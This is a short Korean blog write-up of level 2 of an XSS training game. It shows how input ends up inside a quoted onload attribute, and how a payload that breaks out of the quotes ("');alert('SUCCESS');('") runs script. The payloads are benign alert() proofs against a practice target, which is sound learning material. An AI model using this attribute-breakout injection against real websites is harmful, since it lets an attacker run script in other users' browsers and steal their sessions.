웹해킹/XSS game

[XSS game] 2. Time's out!

renne 2022. 8. 13. 22:01

http://www.xssgame.com/WrfpuKFX8GNr

 

로그인 - Google 계정

이메일 또는 휴대전화

accounts.google.com

 

<script>alert('SUCCESS');</script> 입력

 

입력한 데이터가 그대로 출력된다.

 

<img id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('<script>alert('SUCCESS');</script>');">

Inspect에서 코드를 보니, 입력한 데이터가 작은따옴표( ' ' )로 감싸였다.

 

');alert('SUCCESS');(' 입력

 

성공

<img id="loading" src="/static/img/loading.gif" style="width: 50%; display: none;" onload="startTimer('');alert('SUCCESS');('');">

 

http://www.xssgame.com/u0hrDTsXmyVJ

 

로그인 - Google 계정

이메일 또는 휴대전화

accounts.google.com

 

저작자표시 (새창열림)